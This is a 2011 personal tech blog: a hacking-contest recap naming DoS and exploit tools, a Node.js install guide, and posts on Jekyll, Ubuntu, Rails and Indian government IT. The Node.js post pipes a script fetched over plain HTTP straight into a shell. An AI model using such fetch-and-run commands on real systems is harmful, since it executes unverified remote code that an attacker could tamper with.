Round 3 was organized at Hyderabad and was a head on hack everything contest. We were handed 3 virtual machines, with lots of vulnerable services. We had to keep those services running, which were periodically pinged by a scorebot. Scores were awarded in three categories : attack, defense, and flags.

Attack points were earned upon getting a shell on any of the other team’s servers.

Flag points of awardedon the basis of getting access to secrets stored inside the other team’s servers.

Defense points were earned on the basis of status of your own service.

The network architecture was 3 tiered. A single central router routed requests to a team’s router, which was then connected to an individual team switch. A switch was connected to the host VM, and the attack machines. Two different subnets were created for attack and defense in each team’s router. All uVMs were present in the attack subnets.

Day 1

Day 1 consisted mostly of us learning about the network and trying to gain access into the other systems. All the services were highly vulnerable, and as a result, we had to patch that vulnerability in our own servers before we attacked anyone with it. DoS attacks started late in theday, but were ever present.

The VMs handed t us included a Windows Server 2003, a debian, and an Ubuntu. Only open source/freeware tools were allowed, and we used lots of stuff including :

Backtrack for almost everything since attack laptops given to us had Windows installed
LOIC for DoS attacks
Wireshark for packet analysis.
Snort for intrusion detection.
NMap for scanning services
Metasploit for trying out exploits
Cain and Abel for miscellaneous stuff

Day 2

Day 2 involves lots of pwning,and a surprise twist. All VMs for day 1 had been reset to their current state, and we had to do patch them all over again in first fifteen minutes of the session. Other than that, the increase in traffic was exponential. All our machines were scanned tonell. DoS attacks became normal, and the epic moment of the day was during the last session when we had our router pwned.

Pics from the Event are at Facebook.

Conclusion

Kudos to the Deloitte Team for organizing such a brilliant contest. We had lots of fun. They have assured us that next year it will be even bigger and better. And that the format will be entirely Different. Ext hear so this blog post might not be as helping as you may have thought.

Github +1 URLs

2011-10-17T00:00:00+00:00

I was working on the Google +1 Listing API (undocumented). So here’s a list of my current +1 urls on github.com. Most of the projects pertain to web-designing. I’ll update this list automatically every week or so, provided I remember to/set a cron job.

jayferd/color.js	color.js - The missing color library
typicaljoe/taffydb	taffydb - TaffyDB - an open source JavaScript Database for your browser
antirez/lamernews	lamernews - Lamer News -- an HN style social news site written in Ruby/Sinatra/Redis/JQuery
felixge/node-mysql	node-mysql - A pure node.js JavaScript Client implementing the MySql protocol.
daneden/animate.css	animate.css - A big ol' goody bag filled with CSS animations for WebKit, Firefox and beyond.
javve/list	Do you want a 7 KB cross-browser native JavaScript that makes your plain HTML lists super flexible, searchable, sortable and filterable? Yea
azer/jekyll-social-activities	jekyll-social-activities - a jekyll project template to list social network activities
e1ven/Robohash	Robohash - RoboHash.org
donpark/node-robohash	node-robohash - node.js implementation of Robohash. It's neither complete nor render general SVG.
lg/marshmallow	marshmallow - An open source Campfire server
tmcw/big	big - presentations for busy messy hackers
All of the Hooks	Service Hooks are available for more events (issues, pull requests, forks, etc). Update them through the API!
chromakode/karmabot	karmabot - A highly extensible IRC karma+information bot written in Python.
moserware/PHPSkills	PHPSkills - An implementation of the TrueSkill algorithm in PHP
nodejitsu/docs	docs - Community powered rocket fuel for node.js
spin.js	An animated CSS activity indicator with VML fallback.
Alice.js Demos	Alice.js Demos. Alice.js (A Lightweight Independent CSS Engine) is a micro JavaScript library focused on using hardware-accelerated capabili
tcorral/Design-Patterns-in-Javascript	Design-Patterns-in-Javascript - Based in examples on Head First Design Patterns
atduskgreg/srender	srender - John Resig's Simple Javascript Templating turned into a jQuery Plugin
mrdavidlaing/functional-javascript	functional-javascript - A fun set of koans to teach you functional programming techniques in Javascript
mrdavidlaing/javascript-koans	javascript-koans - Koans to learn Javascript
robrighter/current	current - Node.js app for visualizing http requests on a lan
bcoe/endtable	endtable - A ridiculously simple Object Mapper for Node running on top of CouchDB.
sproutcore/sproutcore	sproutcore - JavaScript Application Framework - JS library only
tpope's Profile	tpope (Tim Pope). You're not logged in! Login; Pricing & Signup. Name: Tim Pope. Website/Blog: http://tpo.pe/. Company: Waiting on t
tpope/vim-fugitive	vim-fugitive - fugitive.vim: a Git wrapper so awesome, it should be illegal
github/gitignore	A collection of useful .gitignore templates
Chosen - a JavaScript plugin for jQuery and Prototype - makes select boxes better	Standard Select.
harvesthq/chosen	chosen - Chosen is a library for making long, unwieldy select boxes more friendly.
rthauby/Paige	Paige - Super simple project page generation
docco.coffee	Docco is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator. It produces HTML that displays your comme
LeaVerou/prefixfree	prefixfree - Break free from prefix hell!
twitter/scala_school	scala_school - Lessons in the Fundamentals of Scala
arcturo/library	A library of free eBooks we're working on
tcr/selection.js	selection.js - A tiny JavaScript DOM selection library for modern browsers and IE5-8.
First Annual Octocat Dodgeball Invitational	Why? We were brainstorming in the office and decided we should throw balls at our enemies. But why stop at destroying our enemies with foam
nide - Beautiful IDE for Node.JS	nide. Beautiful IDE for Node.JS. nide is a web-based IDE for Node.js, designed with simplicity and ease-of-use in mind. The current version
mikeal/request	Simplified HTTP request client.
unconed/TermKit	TermKit - Experimental Terminal platform built on WebKit + node.js. Currently only for Mac and Windows, though the prototype works 90% in an
If Dropbox Used GitHub’s Pricing Plan	If Dropbox Used GitHub's Pricing Plan. What if Dropbox used GitHub's pricing model? Folders? Yes, folders. I have a lot of folders.

Must Use Web Applications

2011-10-15T00:00:00+00:00

Here are a few of the applications that I would heavily recommend.

Workflowy

Here’s how Workflow describes itself.

WorkFlowy is a simple, but powerful way to manage all the information in your life.

Here’s their introductory video:

If that does not hook you, I don’t know what will.

Clipboard

Clipboard is a content archiver tool that makes it quick, snappy, easy, and cool. It has got tons of features and is still in private beta. However, since Michael Arrington blogged about it, it has begun accepting larger number of invites. I’ve only started to use it, but it has been quite awesome till now.

My favorite feature is embed. Everything I’ve embedded on this page is via clipboard, as a demo. You can clip tweets, pics, videos and what not and embed it on your blog easily.

Ge.tt

Ge.tt is one of the many file sharing sites that seem to have cropped up in Web 2.0. Its USP is its simplicty, however don’t be fooled by it. It has got lots of features as well:

Share URLs while your stuff is uploading
Share without even logging in
Drag and drop upload
Versioning for file Uploads
Share multiple files under a single upload
Limited Analytics (See number of Downloads)

So yes, its not as powerful as many others, but has got quite enough features to keep me busy.

Minus]

Minus is a simple image sharing service. It was amongst the first to offer Drag-And-Drop upload back before it was cool. Right now, it is trying to become the next flickr, allowing people to subscribe to each other. If you are someone who posts cool pics regularly, check this out.

My primary browser is Chromium, and here are some Chrome Applications that I use regularly:

Offline GMail

Was a Chrome extension that used Google Gears for letting you use GMail completely offline.

Pros:

Looks cool
Allows multiple accounts
Drafs facility
Labels

Cons

Not all the functionality of Online GMail

Collaborative Editors

I like collaborative editing, working together with people in real-time. Unfortunately, the biggest entrant fizzed out. However, there are still quite a lot of competitors left in the field.

Google Docs

I tend to avoid Google Docs usually, as it is too much of a bloat for me. The integration with Google Chat is good, but sometimes all you need is a plain text editor. There is also an Offline Google Docs application, although it does not allow one to edit documents. Also no presentations.

Etherpad

Etherpad is quite good, as a plain text collaborative editor. I tend it to use it frequently, and it has some excellent features. It makes a thousand revisions of each of my posts, and allows me to play through them, and see who made wat change in real-time. All this, for free. Plus you get chat, and basic formatting (bold, italics, underline).

The previously mentioned workflowy keeps your lists in sync over time, so it is collaborative, though not in real time.

Also, mention goes out to pastehtml, which does an excellent job. Its neither collaborative nor has sharing, but it had me hooked at editable markdown. You can type in markdown, publish in html, and come back and edit your documents, as per your your heart’s wish.

Grooveshark

I rarely listen to music online, but when I do, its either on Youtube or Grooveshark.

Looking back at this document, it seems that there are not many web-apps that I use.

Some other applications that I regularly use, in no particular order:

FreedCamp - A free alternative to Basecamp
IssueBurner - Simple Issue Tracking via Email
Postary - A simple blogging platform. “Write.Share.”
LastPass - Password Manager

I’ll probably add some Chrome Extensions later as well.

Blogging with Jekyll

2011-09-19T00:00:00+00:00

For the past few years, there has been a revolution in the blogging scene. People have moved towards better hosting providers, better blogging tools, with automated, and delayed blogging becoming the norm. Posts are written months in advance, and proof-read dozens of times, before making it to the general public. Wordpress, Blogspot, Tumblr, Posterous, Texpaterrn are pretty much everything that most of the bloggers use. However, there have been some silent niche entries in this market. Static Site Generators.

Static Site Generators

Static Site Generators are tools which you use to generate a static version of your site. Instead of using a dynamic scripting language (such as php), your tool takes in your markup & combines it with your blog posts to generate an html only version of your site. This version is then uploaded(for eg, via ftp) and is then visible as your blog. Most such tools are written in languages such as ruby, python, node.js, and erlang. The most commonly known are Jekyll, Hyde, nanoc, and webby. An excellent list is available here.

Benifits of using Static Site Generators

Markup

For me, the most important part of using Jekyll is that it allows me to use markdown as my writing syntax. Markdown is a markup language that is compiled to HTML. It is supposed to be a highly readable version of html. For instance it uses backticks(`) to write code.

`this` becomes this

Also, you can use * to emphasize text(strong or emphasis). Link creation is not the horrible <a href=> that you remember, but the sleek looking [Link text](Link URL). Similarly it offers lots of other features. You can even specify alternative markup languages, such as textile in jekyll configuration.

Ease Of Blogging

You can write blog entries very easily. I’ve added markdown syntax bindings to vim, my favorite editor, and geany has a markdown plugin as well. I am of the opinion that you should write text entries in a text-editor, not a textarea in a browser window. I used Windows Live Writer for quite some time and still believe that it is far ahead of anything else in the market. But the wpost format that it uses is propertiery, and as such stopped me from importing blog posts anywhere.

Revision Control

Revision Control, such as git, works best with text-files. Since your blog entries are now just plain text files, you can easily store them under version control, easily reverting blotched commits, making branches, and merging errors. And in case you do not know it yet, git is awesome!

Layout Tools

Jekyll allows you to define your layout using Liquid Templating. {{content}} translates to the variable content. Similarly you can iterate over blog posts, by using Liquid tags for foreach. The best part is that this is all done before publishing your website, meaning that the final result is always just pure html. You can easily create static portions of your site (such as headers, footers, sidebars).

Getting Started With Jekyll

I’ll start with jekyll, since it is the most used one out there, and runs on github. It even powers this very blog. First, you must install jekyll. On an Ubuntu machine, sudo apt-get install ruby rubygems && gem install jekyll should work. If you are working on development using Ruby, I’d recommend you to rvm, instead of plain vanilla distro ruby installs. For windows folks, install Ruby, and the Devkit using RubyInstaller.org. After that run gem install jekyll.

Instead of preparing a site from scratch, we will instead be forking an existing site running on jekyll, and using it to model our own. This is partly to shield this tutorial from html/css/js which is irrelevant in this case. In this particular case, I will be using my very own website. Download the source code for my website from github and extract it somewhere. Next, you will have to delete all the content inside the _posts, projects, _drafts, contact, & data directories as I do not give permission to you do use those in your site.

Next, create a file called _posts/2011-month-date.md with the following format :


---
title: Title Of Post
layout: post
---
The blog entry follows here in markdown. You can use *italic*, **bold**, [Link](http://google.com), #header1, ##header2 etc.

For more markdown details, visit its official page at http://daringfireball.net/projects/markdown/syntax#autolink

Now, open up the _layouts/ and edit default.html. You’d need basic html skills to replace my photo with your own, and change links to various places. After you are done, just cd into the root directory of the site, and run jekyll. Some output should confirm that the server ran successfully. Open up http://localhost:4000 in your browser, and you will see your web-site running.

Now for the hosting part. All of your current site is hosted in _site folder, so you can upload it anytime you want. Or, if you want, you can use github as your hosting provider. Just follow the instructions on pages.github.com and you should be be up and running in no time.

Six Months of Ubuntu

2011-09-13T00:00:00+00:00

I installed Ubuntu as my primary OS back sometime in February. Not that I’d not tried it earlier. In fact, I’d used a copy of Ubuntu 3 back in day. But this time around, Windows (from my dual boot) just gave up and died. The partition with Windows got heavily corrupted, lost lots of data, and ultimately I had to format it. And Ubuntu dragged through all that. And here I’m today, a veteran of 3 Ubuntu versions, starting with 10.10, and right now on the 11.10 beta.

What have I learned ? That its better than Windows, for one. But several other things as well. I’m writing this post from the general linux-distro scene, and not just Ubuntu in specific. For the period before Feb, I’d been using Linux Mint as my primary OS for quite some time. But Ubuntu Natty Alpha brought all that Unity love (which I doted on once), and I had to move to 11.04

Reasons to switch to Linux

Its free!
Its free! No more paying up for Windows. People who had Windows ship with their computers would be delighted to know that there is something called a Windows Refund, which allows you to be compensated by the cost of Windows, if you decide not to use it.
Better file system. If you’ve ever lost yourself in the mirth of files in “Program Files”, “AppData”, “Application Data”, “sytem32” and the like, you’d be delighted to know that there is a very well balanced binary management system in Linux. All binaries are in PATH, unlike Windows, where some softwares do that, and most don’t. So you can actually run php, git, ruby from any damn place that you want. People who have tried to compile Java programs using javac on Windows might remembring updating PATH in Windows. No more of that in Linux.
Free softwares! The majority of good software on Windows is paid (and even more with Mac). But in the Linux world, (almost) everything is free. What is paid for then? Some games, high level commercial softwares and the like. But most of the stuff is free.
Package Management Apparently Windows 8 will have some sort of app-store with it. Which is a long time coming in Windows. But guess what, almost all Linux distros have some flavor of package manager built in. Debian (and Ubuntu) has apt-get, Arch has pacman, Fedora has yum. And installing softwares is as easy as it could be. Need mysql? Just type sudo apt-get install mysql. Done. Boom. Just like that.
Customization Level Even though I don’t like the messing up of Gnome by Ubuntu, there are tons of alternatives available. I’m right now using Gnome-Shell, and have plans to move to xmonad, which is another Window Manager. Almost every feature on the Linux desktop can be customized.
Terminal I’d always had planned several learn bash scripting kind of to-dos but never got to it until I started using Linux. Even if you don’t script, the actual power of your machine is opened by the terminal. Hacking away in vim, and browsing sites using elinks, and ordering Pizzas in Command Line is as geeky as it gets. Gnome is designed in such a way to allow a normal user to use his computer fully without touching the terminal, but if you use it, it gets better & better.
Applications There was a time I used to be a Windows fanatic, using WMP, Zune, Everything and what not. But now, I’ve got a bigger arsenal of softwares. Ever used Audacious? That’s my default music player, and its awesome.
Software Development You use Windows to develop stuff for Windows. I’m nowhere near to writing applications in C#. I’ll probably be hacking away scripts in ruby, node, python, bash, and building stuff using xul, gtk, webgtk, and qt. All my web applications are ultimately deployed on Linux machines, so it makes sense to write them on Linux. And only Linux has the ease of language package managers, like rubygems, npm, and pip.
Open Source I haven’t yet checked out the Linux Kernel source code, but I’m thinking of getting my hands dirty real soon. Ever since I’ve joined github, I’ve been introduced to several awesome coders, projects, and organizations. And guess what? Its all open source! Meaning I actually spend less time writing parsers for xml, and more time working on applications.

What I’ve Learned

Be utterly fearless Back when I was in Windows, a simple partition deletion used to scare me to death. Now? I’m ready for anything. If you, like me, go play with the alpha of all your favorite stuff, then things will break. And it will be fun to solve all that stuff. You will learn a thousand new things in the process, gain lots of rep on askubuntu, and become a Ubuntu Jedi Master. OK, maybe not the last bit, but you shall become utterly fearless of all danger. I had to use my computer without network accesibility for three days. And it didn’t even give me a GUI. So I just drudged along for 3 days straight on the console. :)
Community Sometimes, I feel people do not get my helpful comments, and offerings of help on Facebook. Its not their fault. They’ve never been introduced to a proper online, helpful community before. The Linux community is helpful, worldwide, readily available, and has probably handled the problem that you are facing now.
Server Administration I’m still lacking on the cloud front, as I don’t have servers powerful enough to host virtual machines. But otherwise, I’ve handled lots of stuff. ssh is my thing, and I use git to deploy applications like a pro. I’ve moved on from apache to nginx to cherokee and what not.
Take Backups Remember all those “Take Backups before installing Windows/Ubuntu” things that popup while installing your OS. I never paid attention to them, until recently. Now, I’ve got backups scheduled on Dropbox, SpiderOak, and a custom SparkleShare server. I make sure to host my code on github, or my personal git repositories and backup images to Picasa. Everyone knows hard discs are unreliable, so why not make your data redundant and take backups.

The only counter argument would be that Windows has much more stream-lined view of things, with almost everything offering a GUI based application to amange stuff. That’s just not the Linux way. Still, I’m not one of those crazy fanatics who go around preaching Linux (maybe I am!). I feel that if you are using your computer to just open Chrome, Firefox, VLC, and Word, then anything would do. You could probably install android on your computer and do everything you are doing right now. If you are a heavy gamer, then better stay with Windows. And if you are a programmer, switch to Linux.

Windows 8

I installed a developer preview copy of Windows 8 recently, and although I was really awed by its designs concepts, I feel that it is still lacking in certain fronts. For instance, it seems to me that Microsoft is trying to get 8 to the tablets much more readily than on the desktops. Why? Because, there is nothing that can undermine Windows superior market share in Desktops for the near future. However Android & iOS have a very strong presence. Ergo, Windows 8 goes to tables.

I installed all my favorite programs on Windows 8, but had to switch back after a few days. As a developer, it just does not offer me the same freedom, and easy workflow that I am accustomed to. For instance :

Installing Ruby with build support for gems took a lot of time and patience.
Cygwin does not compare anywhere near to a bash shell. Its like this tiny humble brother of shell who turns away when you say PATH. You have to type all those monstrous C:/\ kind of paths.
No App Store. Windows 8 dev preview does not have an app store yet, which was one of the reasons I had tried Win8. I’m used to frequently browsing the Ubuntu Software Center just to find something that fits.
I found that my productivity reduced to half when I was on Windows. I spent too much time looking for stuff which could be done by a single line bash on Linux

Tags: operating systems, linux, ubuntu, windows 8, weblog ifest 2011

Programming in Node.JS

2011-09-12T00:00:00+00:00

After my attempts at python, Ruby on Rails, this was the time for node.js. You ask me what is node.js ? Remember when Google Chrome came out and went blazing past the rest of the browsers in Javascript benchmarks. That was because of its internal Javascript Engine, called V8.

Soon, V8 was developed as a backend to an evented IO library, that is now known as node.js. Initially, it was named just node, but to prevent confusion, and explain its javascript inheritance, it was renamed node.js. This is the water-cooler moment of the language. If you know node, you’re the cool guy on the block. So what is so special in node ?

Evented IO

Basically node allows you bring home the same good anonymous functions from JQuery on your server. In advanced terms, node allows evented input/output, meaning all the IO calls are non-blocking and evented, or scheduled in parallel.

Traditional I/O:

data = file.read("/foo/bar");
  // wait...
  doSomething(data);

Evented I/O:

file.read("/foo/bar", function(data) {
  // called after data is read
  doSomething(data);
});
otherThing(); // execute immediately;

How To Install

The official installation guide is present at https://github.com/joyent/node/wiki/Installation. I’d present a slightly different version, using nvm, i.e Node Version Manager.

Unix/Linux

Dependencies

There are some dependencies on installing node.

sudo apt-get install git-core build-essentials libssl-dev

Run the corresponding command for your distro (yum etc).

Installing nvm

Clone nvm: git clone https://github.com/creationix/nvm.git ~/.nvm
Include nvm: . ~/.nvm/nvm.sh //The dot is important
Source it to your bash file. Basically copy the above command(2) inside your ~/.bashrc.

Fetching node

Node is under heavy development at the moment. Development of node is carried across a stable & a testing branch. The stable branch is the one that you should prefer. As of now, stable is v0.4.11 and testing has reached v0.5.6.

Now run the following commands: nvm install v0.4.11 to install v0.4.11 nvm use v0.4.11 nvm alias default v.04.11 to make it default

You can type which node to see the actual node binaries being used.

Package Methods

I would strongly advice against using your distro versions of node, unless you are on a rolling release distro, such as Arch. Please do not run sudo apt-get install node to install node. This would only cause much anguish and pain later on.

As of now, even the beta of Ubuntu 11.10 holds v0.4.9 and is likely to do so for the next 6 months.

Windows

As I’ve stopped using Windows for quite some time, here are instructions from the official node installation guide.

Windows Build (Node v0.5.5): http://nodejs.org/dist/v0.5.5/node.exe I would again recommend to install http://nodejs.org/dist/v0.4.11/node.exe for stability reasons.

Self-contained binaries are available at http://node-js.prcn.co.cc

Node Package Manager

All cool programming languages come with their own package managers. Ruby has rubygems, Python has pip, PHP has PECL, perl has CPAN, and node has npm.

npm holds a large collection of packages that are the extra batteries that don’t come included in node. If you need to parse documents, or do some other fancy stuff in node, don’t look farther than npm. If you need it, chances are, it already has a package in npm. See list of packages on the npm site.

Unix

A simple one line install is available for npm

curl http://npmjs.org/install.sh | sh

After that, you can install any package by npm install package. For instance, install jade by npm install jade

Windows folks can clone the npm repository and run the included nmp.bat file, and hope that it works.

Simple Servers in Node

node.js comes with “batteries included”, and part of that battery is node’s ability to instantly create web servers. Yes, right inside your program, you can easily create web servers, which will hold full compliance to HTTP.

This is a very simple HTTP server, written using the http module(included) in node :

var http=require('http');
http.createServer(function(request, response) {
  var headers = { "Content-Type": "text/plain" };
  response.sendHeader(200, headers);
  response.sendBody("Hello, World!\n");
  response.finish();
}).listen(8000);

As you can see, the createServer function takes a callback function as its argument. The callback function is called for each of the requests. All events are handled easily and instead of a server handling threads, memory etc, node just handles requests. In essence, a request generates an event, which is then handled by the callback function provided.

This is quite similar to the way we program event loops in javascript on the browser.

The good stuff

There are loads of interesting projects using node. Visit the modules section on the node wiki for a list of interesting node modules available. These include node clients for various libraries such as Databases(mysql, postgre, sqlite, Cassandra etc), Microframeworks (lik Sinatra), Frameworks, wikis, CMS, parsers and what not.

I’d recommend starting out with Connect which is a middleware for node, and allows you to wrap your application easily around it. For databases, you can either go with the standard Relational ones(like mysql) or be brave, and take a spin with the noSQL ones like CouchDB, Cassandra, or MongoDB. All of them have native bindings available for node.js.

References

Node On GitHub, including the wiki, documentation & code
Nodejs.org

Blogs & Other resources

NodeJitsu, a company working completely on node.
Getting Started with Node.JS, Express and CouchDB
6 Must Have Node.js Modules
Some cool node projects
HowToNode
The node Beginner book
NodeCasts

StackOverflow Questions on node

Learning Ruby on Rails

2011-08-01T00:00:00+00:00

Continuing my quest on Web Designing, I’ve started learning Ruby On Rails, which is like the most-hyped web framefork of the moment. After all, Github runs on Ruby On Rails, Redmine uses Rails, and so do Basecamp,Hulu,Scribd, and even Twitter. Even though RoR has Ruby in its name, its just a namesake.

Learning Ruby and learning Rails are entirely two different routes, and learning one only gives you a slight advantage in the other. I’m learning Rails by the excellent book, Ruby On Rails 3 Tutorial, by Michael Hartl. It covers Rails 3, which is one reason I picked it as Rails 3 is quite different from Rails 2 in comparision.

Rails in a few words would be described as a Web framework that makes writing web applications really, really easy. And I really mean that. I’ve been programming in Rails for ~2 days, and I can confortably say that it is better than any other PHP framework (viz CakePHP, CodeIgniter, Kohana) simple because it is powered by Ruby.

And the beauty of Ruby is not in its implementation, but in its elegance. Reading ruby code is lie reading seeing a visual presentation. While PHP is the paragraphed, prose version of the same stuff. Simply put, PHP allows you to do the same things, but essentialy it was not readable enough to match Ruby’s elegance.

Rails follows the MVC pattern (Model-View-Controller) for development, and uses it strictly. It has got its own conventions, but as I found out, the concept of convention over Configuration makes much more sense in Rails than it ever did in PHP. All that time I spent in the CakePHP console was nothing compared to the interactivity of the Rails Console(rails c). Starting development server(rails s) is as easy as running the production server(rails s --environment production).

Instead of writing down another beginner tutorial on Rails, I’d rather direct you to some of the excellent Rails resources :

Ruby on Rails 3 Tutorial, the book I’m reading for learning Rails. Highly recommended
RailsBrains, offline API for Rails
Rails Getting Started, Official Rails Getting Started guide
Rails@Stackoverflow

Announcing Planet IITR

2011-07-09T00:00:00+00:00

Planet IIT-R is a blog collection similar to the Planet Ubuntu, Wordpress, and the likes. The basic idea is to create a single address where all blogs of IIT-R are aggregated. This way, people can easily follow happenings and blogs at IIT-Roorkee without individually following various blogs. I’ve added a few blogs to it already, including those of Divye Kapoor, Sanath Rath, Wona, Arasu and the likes.

A complete list of blogs in the planet is available at http://www.planetaki.com/iitr/subscriptions/

Update: There is also a feature in planetaki to suggest a website for the planet. Unfortunately, you need to be logged in to planetaki (ie create a planet) to suggest a site. In case you are, you can use the suggestions feature to suggest websites.

To suggest a blog to add to the list, please use the form below. You can also see the current spreadsheet here :

You can also email me for any further queries.
Further Links :

What if Linus Torvalds designed Google+

2011-07-07T00:00:00+00:00

Google’s announced its next big thing, Google+ to take on Facebook left people wondering if the next version would be called Google++. Inspite of all the great work that Vic Gundotra has put into Google+, it still lacks something. The creator of linux, Linus Torvalds. Google+ is as-of-now the social network for tech-geeks who are part of a field trial experiment(monkeys!) on the site. Google+ is still halfway geek, and in my imagination it would have been the ultimate geek power tool if it had been designed by Linus. Unfortunately, he is busy developing the linux kernel (10 million lines, 2% being his), and we would have to suffice with these thoughts:

Open Source : Google+ would be open sourced. Anyone could run Google+ on their own servers, and use it to create their own Social Network
Command Line : The default Google+ client would run natively on linux/unix but would be ported later to Windows using cygwin.
Difficulty-of-use : Gone are the click and point days. You’d be required to have absolute mastery over at least 5 different commands before you can even post a single item to your feed.
Full Control : You will have full control over whatever you post. You can make 4 changes, stage them, take them back, commit 2 of them, edit a post, and recommit before pushing it to the server. However all of this will be stored.
Git Backend : Both the client and the server will use git as its backend to store history, revisions, links, and circles.
Circles : would be called trees. And you can tag your trees to take a snapshot of your friends lists at a time.
Branching : would allow you to create multiple versions of your profile. The default version will be called master, while you can continue your secret development in alpha, staging, beta branches. Circles will automatically be associated with branches and auto-post items.
Merging : will allow for collaborative posts.
After 12 years of development, Google+ will reach version 2.1
No deletions : Everything in history has an importance. You are allowed to use rebase to rewrite history. Beware: use cautiously. Incorrect usage may lead to painfull scenarios.
A mascot(direwolf ?) would be found for Google+ (probably after it bit Linus in an aquarium)
Facebook would spend $421m fighting Google+
The manual of Google+ would be a labryinth of switches amd command line arguments for all the features that it came with. A user would be expected to read through the entire manual, or at least the first one-third, before being able to do something of use with the service.
To block a user, you must enter his id in an ignore file
3 years hence, the next big thing would be ghub offering a farm-like service to create, host, and customize your own google+ servers.

Note: Based on the history of linux, and the usability of git.

Announcement

The famous announcement of Linux Kernel on the comp.os.minix mailing list is well-known. Slightly re-written, this is how Linus might have announced Google+.

>From: [email protected] (Linus Benedict Torvalds)  
>Newsgroups: web.social.facebook  
>Subject: What would you like to see most in facebook  
>Summary: small poll for my new social network  
>Message-ID: <[email protected]>  
>Date: 28 Jun 11 20:57:08 GMT  
>Organization: Google  

>Hello everybody out there using facebook -

>I’m doing a (free) social network (just a hobby, won’t be big and professional like facebook). This has been brewing since dec, and is starting to get ready. I’d like any feedback on things people like/dislike in facebook, as my site resembles it somewhat (same layout of the news feed and comments(due to practical reasons) among other things).

>I’ve currently ported feed(1.08), comments(2.1), photos(3.14), and likes(1.40), and things seem to work. This implies that I’ll get something practical within a few months, and I’d like to know what features most people would want. Any suggestions are welcome, but I won’t promise I’ll implement them :-)

>Linus ([email protected])

>PS. Yes – it’s free of any facebook code, and it has pipelined js. It is NOT protable (uses google accounts), and it probably never will support anything other than Google App Engine, as that’s all I have :-(.

Tags: WeBlog iFest 2011, humour, linux, linus

Why Indian Government Sucks at Technology

2011-06-22T00:00:00+00:00

Note: All opinions are mine alone. Please keep your opinions limited to comments.

This is in wake of the not-so-anonymous attacks on the nic servers. Apparently a few people had decided to brand their own version of AnonymousIndia and hack into the nic servers. This had been viewed as almost normal in the Indian Media. This is after all something that happens every other day in India. Its just the Indian Army website, nothing that we care about.

Even though there are excellent tech-security companies in India, we have never developed the right attitude to it. People still think that hacking is fun, and its something that could never happen to them. I’ve never seen people reading the fine print on the thousand social web sites they join now a days. Piracy is rampant in India without any checks and the Indian Government is silent.

Why? Because we are used to it. It has always happened this way. Information leaks have been a major part of the Indian history and would remain so unless we realize that the more we embrace technology; the more we become dependent on it, it is coming one step closer to the edge.

A recent tweet by @divyekapoor reminded me of the AADHAR project, which aims to give out a unique identification number to each Indian citizen.

Hacks like these ensure that I will resist giving my Biometrics to the UID project till they've suffered atleast 4 security breaches.
— Divye Kapoor (@divyekapoor) June 18, 2011

I read out the UIDAI docs and it tells us that it would “prescribe protocols to ensure the confidentiality, privacy and security of data”, and “follow the confidentiality, privacy and security protocols prescribed by the UIDAI”. A search on the uidai.gov.in website gives out a little detail :

The UID database will be guarded both physically and electronically by a few select individuals with high clearance. It will not be available even for many members of the UID staff and will be secured with the best encryption, and in a highly secure data vault. All access details will be properly logged.

This is the most that they have to say on the subject. If that makes you feel safe, remember the earlier fiasco involving the security of the EVM machines. Ultimately I’m with the government on that one, however, since a user had to have physical access to actually do any harm to the machine. But it was possible and Election Council kept denying it. As it happened, it seems that all our govt. agencies are probably trying more to hide their technical requirements, rather than make them open.

So why is this approach taken in India? Beauracracy? probably yes. But I feel that unless the technocrats rise up and actually enter the Indian Govt. technical agencies (such as NIC), nothing would change. For instance I find that almost everything that Indian government does is tailored specifically for Windows. There is no reason to plaster “Works best in Internet Explorer 6 at 1024x768” in all your web sites, we already know how much the Indian government. So much so that they get it pre-installed everywhere, even in government schools, and technical institutions.

Yet there is a small faction that is working tirelessly in the other direction as well. For instance the Sakshat project has been under the news recently as well. It would ship with a version of android (which one?) with wi-fi, bluetooth and other frills. However the project has been known for shadowing and changing its details at each conference it is unvealed, so beware. It may suddenly change from an android to a Windows phone in the next one. Or maybe a blade server (speaking of which, the uid project ordered 68 of them.

I’ve worked a little bit on online Geo-Mapping tools earlier (mostly using Google Maps API). However, I wanted some accurate data for one of my projects (such as geographical boundaries). Other sources for this data are not as reliable, and I found the bhuvan online tool to be extremely accurate in this respect. If you’ve forgotten Bhuvan, its the Indian version of Google Maps. It was supposed to be the tool for mapping things. Unfortunately, as things have planned out, most of its claims have been rubbished (like 10m resolution power), or made null due to the extremely slow servers it uses(and it was supposedly optimized for low bandwidths). If you’re plannig to fight google, you’ve to step up your game. Try checking out the horrible design of the Bhuvan website. Leaving aside its horrible interface, Windows only support (.net), installation of additional plugins to just run it, and , it had brilliant geographical data(collected via various government agencies). However as it turns out, this data is not public. Why? It seems that ISRO plans to sell this data to people interested in using it. Wow! So a public funded agency decides to make money from the development done using our money. It’s been close to 3 years since its launch. And I’d be highly interested in knowing where it managed to sell this data.

In all fairness, though they’ve said that they would only sell the high resolution data, while making the general data freely available to users. But I don’t see fair unless its own my system, damn it. If by free you mean I’d have to open your website each time I need to find a village, it seems we have different thoughts about the word’s usage. Oh, and there’s a link on the website’s home page to a section called APIs which redirects to the Bhuvan Software download page, where guess what, there are no APIs at all. I managed to dig a few links and download two versions of their APIs, which seem to be downloaded copies of the documentation of the open layer javascript protocol they are using for mapping in the browser. So the data is available, it seems. But they’re forgetting to mention where.

Seriously, people wake up. This is the 21st century, and the most hyped buzz word today is open-source(well, after cloud). And if you really want to work on things, make them open source. Not just the technology, but the data as well. Becauase open data is essential to growth and planning of a nation, as Hans Rosling keeps on reminding us. Meanwhile, DRDO decides to go ahead and develop its own operating system. Why? Because it will be closed-source and will be much more secure than any of the variants of linux. Or so they think.

The Informatics center still runs thousands of its websites in ASP (not even ASP.net), and this fact alone is enough to scare me off. With major corporations suffering from data leakage (Sony, Gawker) where user access was compromised, it is high time that the Indian Govt. someone realizes that you cannot secure your systems by locking them in a vault. These companies did the same, and look at the result.

Even the American Government has come up with an open-source initiative. Their website data.gov is a collection of applications, apis and raw data collected by various government agencies. And to top it all, the US government invited the top application developers from their platform at data.gov to the White House, hailing them as unsung heroes of the new age. If you’re interested in reading more and taking a stand for the open data democracy, take a look at this whitepaper by the Netherlands Organisation for Applied Scientific Research for a keen review of what are the major barriers to a government from sharing its data. Also go ahead and donate some money to wikileaks, while you’re at it.

